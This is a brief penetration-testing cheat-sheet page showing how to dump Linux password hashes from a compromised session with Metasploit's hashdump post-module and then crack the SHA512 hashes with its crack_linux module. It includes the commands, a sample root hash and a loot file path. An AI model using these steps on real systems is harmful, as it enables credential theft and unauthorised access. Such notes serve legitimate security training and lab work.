Metasploit

  • Gather Linux Password hashes with Metasploit

# background the session with CTRL+Z
search hashdump
use post/linux/gather/hashdump
set SESSION 2
run
[+] root:$6$sgewtGbw$ihhoUYASuXTh7Dmw0adpC7a3fBGkf9hkOQCffBQRMIF8/0w6g/Mh4jMWJ0yEFiZyqVQhZ4.vuS8XOyq.hLQBb.:0:0:root:/root:/bin/bash
[+] Unshadowed Password File: /root/.msf4/loot/20230323100234_default_192.75.64.3_linux.hashes_660271.txt

  • The unshadowed password file is a file containing the format hashed password, ready to be cracked.

#Crack the Hash

search crack
use auxiliary/analyze/crack_linux
set SHA512 true
run

SHA512 as there is $6$ sign at the start of the Hash which indicates SHA512

PreviousLinux Hash CrackingNextPivoting

Last updated